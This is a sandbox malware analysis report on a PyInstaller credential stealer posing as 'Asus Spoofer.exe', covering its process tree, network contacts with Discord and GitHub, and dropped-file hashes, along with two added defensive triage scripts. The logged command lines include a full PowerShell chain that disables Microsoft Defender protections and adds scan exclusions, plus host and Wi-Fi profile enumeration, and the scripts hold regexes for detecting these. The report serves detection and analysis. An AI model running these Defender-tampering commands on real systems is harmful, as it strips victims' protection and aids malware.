Malware Analysis Report

2025-05-05 21:32

Sample ID: 240529-qvy25sga7t
Target: Asus Spoofer.exe
SHA256: a62fbb8137b590bcf3523ea2e611426570de44a35b90dde23c708923f5b63b83
Tags: pyinstaller, upx, execution, spyware, stealer
Score: 8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 8/10

SHA256: a62fbb8137b590bcf3523ea2e611426570de44a35b90dde23c708923f5b63b83

Threat Level: Likely malicious

The file Asus Spoofer.exe was found to be: Likely malicious.

Malicious Activity Summary

Tags: pyinstaller, upx, execution, spyware, stealer

Command and Scripting Interpreter: PowerShell

Drops startup file

UPX packed file

Loads dropped DLL

Reads user/profile data of web browsers

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Unsigned PE

Detects Pyinstaller

Suspicious use of WriteProcessMemory

Detects videocard installed

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-29 13:35

Signatures

Detects Pyinstaller

Tag: pyinstaller
No per-match details reported (Description, Indicator, Process and Target all N/A).

Unsigned PE

No per-match details reported (Description, Indicator, Process and Target all N/A).

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-29 13:35

Reported

2024-05-29 13:38

Platform

win7-20231129-en

Max time kernel

120s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe"

Signatures

Loads dropped DLL

Process: C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe (1 event; Description, Indicator and Target N/A).

UPX packed file

Tag: upx
No per-match details reported (Description, Indicator, Process and Target all N/A).

Processes

C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe

"C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe"

C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe

"C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe"

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\_MEI22442\python311.dll

MD5 069b018273ea88565919dbc1ffd48334
SHA1 8037d5ba2bbdad460469457683b8a3474999d990
SHA256 c0472e1f16648a3adaba4e012d518a69c74e5649a65097c16eedf0231fd75ee4
SHA512 63e0e6a75334b1d4a4c0da76d199ea7f87ebb8ea768f81bd09b2170cd1cb0d8cf979ae6678d8a4359457ff3c676723a6256b54f2a2077cc419fbc9aa7ce484b5

memory/2364-105-0x000007FEF5640000-0x000007FEF5C32000-memory.dmp

On the Windows 7 image the sample extracted only python311.dll, spawned nothing beyond its own PyInstaller child process, and produced no network traffic. CPython 3.9 and later do not run on Windows 7, so the bundled 3.11 interpreter cannot start there; this run says nothing about the payload, and the behavioral2 (Windows 10) run below is the one to read.

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-29 13:35

Reported

2024-05-29 13:38

Platform

win10v2004-20240508-en

Max time kernel

136s

Max time network

128s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe"

Signatures

Command and Scripting Interpreter: PowerShell

Tag: execution
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (3 events; Description, Indicator and Target N/A). The PowerShell command lines themselves are listed under Processes below: every one is a Set-MpPreference or Add-MpPreference call that weakens Microsoft Defender, so this signature is the execution side of a defence-evasion step rather than generic script use.

Drops startup file

File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Asus Spoofer.exe (by C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe)
File opened for modification: the same Startup-folder path, by the same process.

A copy of itself in the per-user Startup folder runs at every interactive logon of that user without administrator rights or any registry change. The Add-MpPreference -ExclusionPath C:\Users\Admin\AppData command in the Processes section covers C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup as well, so the persisted copy is also carved out of Defender scanning.

Loads dropped DLL

Process: C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe, 52 events (Description, Indicator and Target N/A on every row). These correspond to the PyInstaller runtime and dependency modules the sample extracts to C:\Users\Admin\AppData\Local\Temp\_MEI31842\ and then loads; the individual files and their hashes are listed under Files below.

Reads user/profile data of web browsers

Tags: spyware, stealer
No per-match details reported for this signature. The bundled sqlite3.dll and _sqlite3.pyd under Files are consistent with reading browser SQLite databases (logins, cookies, history), but the page does not record which browser profiles were opened.

UPX packed file

Tag: upx
64 matches; no per-match details reported (Description, Indicator, Process and Target all N/A). The static analysis did not flag UPX and the sandbox does not say which files matched. On a PyInstaller build, UPX usually means the bundle was created with PyInstaller's --upx-dir option, which compresses the bundled DLL and .pyd files; the files listed under Files can be checked for UPX0/UPX1 section names to confirm.

Legitimate hosting services abused for malware hosting/C2

Indicator: discord.com (4 events); raw.githubusercontent.com (2 events). Description, Process and Target N/A.

The Network table below shows only DNS lookups and TLS connections on port 443 to these hosts, with no URL path or payload, so the page cannot establish whether discord.com served as a webhook exfiltration endpoint or raw.githubusercontent.com delivered a second stage. Treat both as pivots for the full PCAP or a decrypted-TLS run, not as confirmed C2.

Looks up external IP address via web service

Indicator: api.ipify.org (2 events). Description, Process and Target N/A.

Stealers query this service to stamp the victim's public IP, and from it the country, onto the report they exfiltrate. On its own the lookup is benign and many legitimate programs do it; it matters here because of what surrounds it.

Detects videocard installed

Process: C:\Windows\System32\Wbem\WMIC.exe (1 event; Description, Indicator and Target N/A). This is the wmic path win32_VideoController get name command listed under Processes below.

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target (Indicator and Target were N/A on every row; rows grouped by process):

C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe: Token: SeDebugPrivilege (1 event).

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Token: SeDebugPrivilege (4 events, one per PowerShell instance).

C:\Windows\System32\Wbem\WMIC.exe: three runs, each enabling the same list in the same order: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege. The first two runs continue with four privileges the sandbox logged only by LUID (Token: 33, 34, 35, 36); on current Windows builds those LUIDs are SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege and SeDelegateSessionUserImpersonatePrivilege, which is consistent with the ascending LUID order of the named entries. The third run's logged list ends at SeManageVolumePrivilege.

Caveat: wmic.exe enables every privilege present in its token when it starts, and SeDebugPrivilege is routinely seen for powershell.exe in sandbox runs, so those rows are baseline behaviour of the tools, not something the sample requested. The only entry attributable to the sample's own code is SeDebugPrivilege in Asus Spoofer.exe, which is consistent with the bundled psutil module (see Files), which enables that privilege when it is imported.

Suspicious use of WriteProcessMemory

Description Indicator Process Target (Indicator N/A throughout; every parent/child pair appears twice in the original table, once per write). De-duplicated and laid out as the process tree the writes describe, PIDs as logged by the sandbox:

3184  C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe (PyInstaller bootloader)
  3784  C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe (bootloader child; runs the bundled Python code and spawns everything below)
    4832  C:\Windows\system32\cmd.exe
    4064  C:\Windows\system32\cmd.exe
      1916  C:\Windows\System32\Wbem\WMIC.exe
    1096  C:\Windows\system32\cmd.exe
      3636  C:\Windows\system32\netsh.exe
    3504  C:\Windows\system32\cmd.exe
      1404  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      812   C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      3556  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      4612  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    4304  C:\Windows\system32\cmd.exe
    2728  C:\Windows\System32\Wbem\wmic.exe
    4200  C:\Windows\system32\cmd.exe
      3940  C:\Windows\System32\Wbem\WMIC.exe
    1712  C:\Windows\system32\cmd.exe
      812   C:\Windows\System32\Wbem\WMIC.exe
    4908  C:\Windows\system32\cmd.exe
      2400  C:\Windows\System32\wbem\WMIC.exe

Two caveats. First, each write here goes from a parent into a child it has just created, which is what the sandbox records for ordinary process start-up; the bootloader-to-child write is standard PyInstaller one-file behaviour (the bootloader re-launches itself to run the extracted Python runtime). Nothing in this table is an injection into a foreign process. Second, PID 812 is used twice (a powershell.exe under 3504, later a WMIC.exe under 1712), so the first 812 had exited and its PID was reused; a detection keyed on PID alone would conflate them.

Processes

C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe

"C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe"

C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe

"C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\System32\Wbem\wmic.exe

wmic cpu get Name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"

C:\Windows\System32\wbem\WMIC.exe

C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid

Notes on the command lines above.

The cmd.exe /c powershell.exe Set-MpPreference chain turns off real-time monitoring, IOAV (download and attachment) scanning, script scanning and the intrusion prevention system, drops network protection to audit mode, disables cloud (MAPS) reporting and sample submission (NeverSend and the numeric 2 in the follow-up call are the same value), then excludes the whole of C:\Users\Admin\AppData and every file with the .exe extension from scanning. Set-MpPreference and Add-MpPreference only take effect from an elevated process, and with Tamper Protection enabled Defender rejects these changes. The report does not record whether each call succeeded; the sandbox runs the sample as the Admin user, so nothing here should be read as proof that the technique works on a hardened host.

The second exclusion expands %USERPROFILE%\Local to C:\Users\Admin\Local, a directory that does not normally exist; the author evidently meant AppData\Local, which the first exclusion already covers.

ver, the five WMIC queries (csproduct get uuid, os get Caption, cpu get Name, path win32_VideoController get name, computersystem get totalphysicalmemory) and netsh wlan show profiles are host fingerprinting and saved Wi-Fi profile enumeration, the raw material of a stealer's victim report. csproduct get uuid is run twice, once via cmd.exe and once with an explicitly escaped full path to WMIC.exe.
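The command lines above are the behaviour worth detecting, so here is an added example, written for this page and not code from the sandbox or the sample, that classifies them: a few regex rules for Defender tampering, Defender exclusions, Wi-Fi profile enumeration and WMIC hardware fingerprinting, run over a constructed subset of the behavioral2 command lines. The rule names, patterns and verdict thresholds are this example's own assumptions; the same rules can be pointed at Sysmon Event ID 1 or EDR process-creation logs.

```python
"""Classify sandbox process command lines into the behaviours a stealer triage cares about.

Added example for this report: the sample command lines are a subset of the
behavioral2 "Processes" list above; the rule names, regexes and scoring are this
example's own, not sandbox signatures.
"""
import re
from collections import defaultdict

# Command lines copied from the behavioral2 process list (leaf commands plus a few
# of the cmd.exe wrappers); the first entry is the sample's own launch.
SAMPLE_CMDLINES = [
    r'"C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe"',
    r'C:\Windows\system32\cmd.exe /c "ver"',
    r'C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"',
    r'wmic csproduct get uuid',
    r'C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"',
    r'netsh wlan show profiles',
    r'powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true '
    r'-DisableIOAVProtection $true -DisableRealtimeMonitoring $true '
    r'-DisableScriptScanning $true -EnableControlledFolderAccess Disabled '
    r'-EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled '
    r'-SubmitSamplesConsent NeverSend',
    r'powershell.exe -inputformat none -outputformat none -NonInteractive '
    r'-Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"',
    r'powershell.exe -inputformat none -outputformat none -NonInteractive '
    r'-Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"',
    r'''powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"''',
    r'wmic os get Caption',
    r'wmic cpu get Name',
    r'wmic path win32_VideoController get name',
    r'wmic computersystem get totalphysicalmemory',
    r'C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid',
]

RULES = {
    # Defender protection features switched off or cloud reporting silenced.
    "defender_disable": re.compile(
        r"Set-MpPreference\b.*?(?:-Disable\w+\s+\$true|-MAPSReporting\s+Disabled"
        r"|-SubmitSamplesConsent\s+(?:NeverSend|2)\b|-EnableControlledFolderAccess\s+Disabled)",
        re.IGNORECASE),
    # Exclusions that carve the malware's own folder or extension out of scanning.
    "defender_exclusion": re.compile(
        r"(?:Add|Set)-MpPreference\b.*?-Exclusion(?:Path|Extension|Process)\b",
        re.IGNORECASE),
    # Saved Wi-Fi profile enumeration (the step before key=clear password dumping).
    "wifi_profiles": re.compile(r"\bnetsh\s+wlan\s+show\s+profiles?\b", re.IGNORECASE),
    # Hardware / OS fingerprinting through WMIC.
    "hw_fingerprint": re.compile(
        r"\bwmic(?:\.exe)?\s+(?:csproduct|cpu|os|computersystem|path\s+win32_videocontroller)\b",
        re.IGNORECASE),
}


def classify(cmdline):
    """Names of the rules that match one command line, sorted for stable output."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))


def summarize(cmdlines):
    """Rule name -> list of matching command lines (unmatched lines are dropped)."""
    hits = defaultdict(list)
    for line in cmdlines:
        for name in classify(line):
            hits[name].append(line)
    return dict(hits)


def verdict(cmdlines):
    """Coarse triage call from the rule hits.

    Defender tampering has no benign reading, so it alone is enough; recon-only
    hits are surfaced but left for an analyst.
    """
    hits = summarize(cmdlines)
    if "defender_disable" in hits or "defender_exclusion" in hits:
        return "malicious: Defender tampering"
    if "wifi_profiles" in hits or "hw_fingerprint" in hits:
        return "suspicious: host/Wi-Fi recon only"
    return "no rule matched"


if __name__ == "__main__":
    for name, lines in summarize(SAMPLE_CMDLINES).items():
        print(f"{name}: {len(lines)} hit(s)")
        for line in lines:
            print("   ", line[:100])
    print(verdict(SAMPLE_CMDLINES))
```

Run it directly and it prints the hits per rule and the verdict for the embedded command lines; swap SAMPLE_CMDLINES for the CommandLine field of your own process-creation events to reuse the rules.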

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 216.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
BE 88.221.83.186:443 www.bing.com tcp
US 8.8.8.8:53 186.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 232.136.159.162.in-addr.arpa udp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.13.205:443 api.ipify.org tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 205.13.26.104.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 32.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp

Reading the table: the in-addr.arpa rows are reverse lookups the sandbox issues for every IP it sees, not sample activity, and the www.bing.com and tse1.mm.bing.net connections are the kind of background traffic a Windows 10 image produces on its own. What remains attributable to the sample is one TLS connection to raw.githubusercontent.com (185.199.108.133), then discord.com (162.159.136.232), then api.ipify.org (104.26.13.205), then discord.com twice more, all on port 443. That sequence fits a stealer that fetches something from GitHub, looks up the victim's public IP and posts to Discord, but the page carries no request bodies to confirm it.
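To turn the table above into something actionable, here is an added example, not part of the original report, that parses rows in the same four-column layout, drops the sandbox's own reverse-DNS lookups and the port-53 resolver traffic, suppresses hosts assumed to be Windows background noise, and annotates what is left. The OS_BACKGROUND set and the ABUSED_SERVICES notes are assumptions for illustration; the table text is a constructed subset of the rows above.

```python
"""Reduce a sandbox network table to the connections worth pivoting on.

Added example for this report: NETWORK_TABLE is a subset of the behavioral2
"Network" section above; the noise list and the service-abuse notes are this
example's own assumptions, not something the sandbox asserted.
"""
import ipaddress
from collections import OrderedDict

# Rows copied from the report (constructed subset; same column layout as the page).
NETWORK_TABLE = """\
Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
BE 88.221.83.186:443 www.bing.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.13.205:443 api.ipify.org tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
"""

# Hosts a stock Windows 10 sandbox image contacts on its own (assumption: tune per image).
OS_BACKGROUND = {"www.bing.com", "tse1.mm.bing.net"}

# Legitimate services stealers lean on; the note says what to check, it is not a verdict.
ABUSED_SERVICES = {
    "discord.com": "possible webhook exfil/C2 (confirm the URL path from a PCAP)",
    "raw.githubusercontent.com": "possible second-stage/config download",
    "api.ipify.org": "victim public-IP lookup for the stolen-data report",
}


def parse_rows(text):
    """Parse the 4-column table; DNS rows keep port 53 so they can be filtered later."""
    rows = []
    for line in text.splitlines()[1:]:          # skip the header line
        parts = line.split()
        if len(parts) != 4:
            continue
        country, dest, domain, proto = parts
        ip, _, port = dest.rpartition(":")
        try:
            ipaddress.ip_address(ip)             # drop malformed destinations
        except ValueError:
            continue
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain, "proto": proto})
    return rows


def is_ptr_lookup(row):
    """Reverse lookups the sandbox itself issues for every IP it sees."""
    return row["domain"].endswith(".in-addr.arpa")


def egress(rows):
    """Non-DNS connections keyed by (domain, ip, port, proto) with hit counts, in first-seen order."""
    conns = OrderedDict()
    for r in rows:
        if r["port"] == 53 or is_ptr_lookup(r):
            continue
        key = (r["domain"], r["ip"], r["port"], r["proto"])
        conns[key] = conns.get(key, 0) + 1
    return conns


def triage(text):
    """Connections left after noise removal, annotated with what to investigate."""
    findings = []
    for (domain, ip, port, proto), hits in egress(parse_rows(text)).items():
        if domain in OS_BACKGROUND:
            continue
        findings.append({"domain": domain, "ip": ip, "port": port, "proto": proto,
                         "hits": hits, "note": ABUSED_SERVICES.get(domain, "unclassified")})
    return findings


if __name__ == "__main__":
    for f in triage(NETWORK_TABLE):
        print(f"{f['domain']:28} {f['ip']}:{f['port']} x{f['hits']}  {f['note']}")
```

The output keeps first-seen order, which preserves the download-then-exfiltrate sequence a stealer tends to show; anything tagged "unclassified" is a new host to look up before the Discord and GitHub entries get blocked.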

Files

_MEI31842 is the PyInstaller one-file extraction directory (the _MEI prefix, the bootloader PID 3184 and a counter), created under the user's Temp folder when the sample starts and normally deleted when it exits. Everything listed below is the CPython 3.11 runtime (python311.dll, python3.DLL, base_library.zip, the standard-library .pyd modules, OpenSSL 3 libcrypto-3.dll and libssl-3.dll, the VC runtime) plus the third-party packages the script imports: pywin32 (win32api.pyd, pythoncom311.dll, pywintypes311.dll), psutil, zstandard and cffi. None of these files is the sample's own code; the Python payload lives in the archive appended to the executable and is not written to disk as a separate file, so the hashes below identify the toolchain, not this family.

C:\Users\Admin\AppData\Local\Temp\_MEI31842\python311.dll

MD5 069b018273ea88565919dbc1ffd48334
SHA1 8037d5ba2bbdad460469457683b8a3474999d990
SHA256 c0472e1f16648a3adaba4e012d518a69c74e5649a65097c16eedf0231fd75ee4
SHA512 63e0e6a75334b1d4a4c0da76d199ea7f87ebb8ea768f81bd09b2170cd1cb0d8cf979ae6678d8a4359457ff3c676723a6256b54f2a2077cc419fbc9aa7ce484b5

C:\Users\Admin\AppData\Local\Temp\_MEI31842\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

memory/3784-107-0x00007FFDAE860000-0x00007FFDAEE52000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31842\_ctypes.pyd

MD5 e72bdb1f065056f3d7068219592c7100
SHA1 efe3c0e416635fa1bb5158b35382486462dfb5ea
SHA256 c17904b56720e127e910ac9071d6b402686dea682b885910502ca35ad236f7ff
SHA512 f956393431b0c9c54cac8f448a234f7b447b2a44785e8576824efcaa0838d8216168b292a1eaf2fd9df97a2f16149c39698c66e9244d5839bdf718609e2d6014

C:\Users\Admin\AppData\Local\Temp\_MEI31842\python3.DLL

MD5 7e07c63636a01df77cd31cfca9a5c745
SHA1 593765bc1729fdca66dd45bbb6ea9fcd882f42a6
SHA256 db84bc052cfb121fe4db36242ba5f1d2c031b600ef5d8d752cf25b7c02b6bac6
SHA512 8c538625be972481c495c7271398993cfe188e2f0a71d38fb51eb18b62467205fe3944def156d0ff09a145670af375d2fc974c6b18313fa275ce6b420decc729

C:\Users\Admin\AppData\Local\Temp\_MEI31842\libffi-8.dll

MD5 ae513b7cdc4ee04687002577ffbf1ff4
SHA1 7d9a5eb0ac504bc255e80055d72e42ccb7ab7b4d
SHA256 ed18fc7eee1bf09d994d8eba144e4e7d1e6a030ba87888001eea550d7afffada
SHA512 9fcb24debfaf035a3604a2a9abece0655424f981ebb0afef14b9674e57030dea8c5c230ca8cc13c10de8422777b4c549002350f62b9259c486cca841d9c81634

memory/3784-117-0x00007FFDC72D0000-0x00007FFDC72DF000-memory.dmp

memory/3784-116-0x00007FFDC2170000-0x00007FFDC2194000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31842\base_library.zip

MD5 4b011f052728ae5007f9ec4e97a4f625
SHA1 9d940561f08104618ec9e901a9cd0cd13e8b355d
SHA256 c88cd8549debc046a980b0be3bf27956ae72dcdcf1a448e55892194752c570e6
SHA512 be405d80d78a188a563086809c372c44bcd1ccab5a472d50714f559559795a1df49437c1712e15eb0403917c7f6cfaf872d6bb0c8e4dd67a512c2c4a5ae93055

C:\Users\Admin\AppData\Local\Temp\_MEI31842\sqlite3.dll

MD5 5354a355b143300b8ab27f3258005e5e
SHA1 6c7c82c0d836a61a8a808217919369ad3ca5338b
SHA256 4baf0be67789f01a9410c6dc565063316d2922cd4eb33b3a57f3db5988519bbb
SHA512 a5b601d9e5022a4fa5cf457090d949489da16a496bf45d185dd563c0df9efb9a37ccbc32cd1324292f0b0775235458ca3f1a9ee8d7135471b31983cba1a43f9b

C:\Users\Admin\AppData\Local\Temp\_MEI31842\_uuid.pyd

MD5 cc2fc10d528ec8eac403f3955a214d5b
SHA1 3eefd8e449532c13ae160aa631fdb0ad8f6f2ea4
SHA256 e6aa7f1637e211251c9d6f467203b2b6d85e5bc2d901699f2a55af637fa89250
SHA512 bf18089bd0b3a880930827d2035302060ea9db529ad1020879e5be6de42693bd0a01b40270b4e93ceaea3cfed20dad1e2942d983cde8bb2c99159b32209b34bb

C:\Users\Admin\AppData\Local\Temp\_MEI31842\_socket.pyd

MD5 54033c133dce045e7ba56c8dafb5a333
SHA1 1211095dd57c0a59f52b694b2098db3127e4ae21
SHA256 bc9bf1dbceefad62216f14968f4617ad6d6e526481f02a13d3220e9159b9ddf6
SHA512 903b92d4aeff70a5beddb1f9964983eaf5353c505f8bbf80881fccd44264b0fcd18e7abd6be6f30fc26cd50123c478098cc5022256fface1200356f5a1424269

C:\Users\Admin\AppData\Local\Temp\_MEI31842\select.pyd

MD5 85218837049b8df6d7ab05b5ebb9d638
SHA1 d9f547f10017e462bc459b8b186d9a36a7cd2003
SHA256 09e89203221f7315ec04ce1fb2ebe82b513687a8e5f082a4c5111158afd5b87c
SHA512 f6158dae0265792d065a49294aedc246642426ed3e159bf62f0cab5ad81b5d45e8e92454394b9736365d371c1f0a5326808a2873c866cfbe6a40f752d7fd2561

C:\Users\Admin\AppData\Local\Temp\_MEI31842\VCRUNTIME140_1.dll

MD5 f8dfa78045620cf8a732e67d1b1eb53d
SHA1 ff9a604d8c99405bfdbbf4295825d3fcbc792704
SHA256 a113f192195f245f17389e6ecbed8005990bcb2476ddad33f7c4c6c86327afe5
SHA512 ba7f8b7ab0deb7a7113124c28092b543e216ca08d1cf158d9f40a326fb69f4a2511a41a59ea8482a10c9ec4ec8ac69b70dfe9ca65e525097d93b819d498da371

C:\Users\Admin\AppData\Local\Temp\_MEI31842\win32\win32api.pyd

MD5 c10558ce9e111a1da405afca0faf4e55
SHA1 ba2f93e0408bde1c0067ad0cdedaa34ac09818dd
SHA256 ad65e409f78b1c79b70c27b1ff7bfbfb7887a453c81adcb4a8959c1c157cdf21
SHA512 cc3ea8af5f2b2298b8931ff7d82c0d28fcfef2740727fa4627ce44d2dda94cb67c3ad37326643e0f6755df2983a8d82e3f4ca0a6a764caed2a9e6155409e99b2

memory/3784-158-0x00007FFDBDD60000-0x00007FFDBDE1C000-memory.dmp

memory/3784-159-0x00007FFDBDCC0000-0x00007FFDBDCEB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31842\pywin32_system32\pythoncom311.dll

MD5 62af504ed6833fe66fe2c670c50ecee4
SHA1 df1156eb1892ee3add76ada1f1234c7462678dc2
SHA256 bfcef0b70fc4bf1693d7d067c3fdbf3379cd67477fbcfebb07e19ed7c811198b
SHA512 befed25ef08001d2d2e19c14410f2c59c4f45d6cf4a4937a3029d6dc0ef13a9100260efbe40f8fa2532abd1b483eae0976b43697668f2e8c77094cdb090b90cb

memory/3784-154-0x00007FFDBE070000-0x00007FFDBE09E000-memory.dmp

memory/3784-151-0x00007FFDC0200000-0x00007FFDC020D000-memory.dmp

memory/3784-150-0x00007FFDC0350000-0x00007FFDC035D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31842\pywin32_system32\pywintypes311.dll

MD5 ee14f23f869d7b6141dfafe5d1ed7243
SHA1 3e337ad2dcdf3f0c8452ec617ce421c8abb3263a
SHA256 d11cdd3026eada9b4d5d4c5e5b632dae9d7d74a7cd151fa210d1fb5ccf43c589
SHA512 e7d98a5e93795e22df8650675a5ae6941b2fe285c9c1f41d99db1ccb58fd0d2ea9d3acb55a1958d5ab45bd75349406ab94430d8ae3fcfa62c7bab024572c07b2

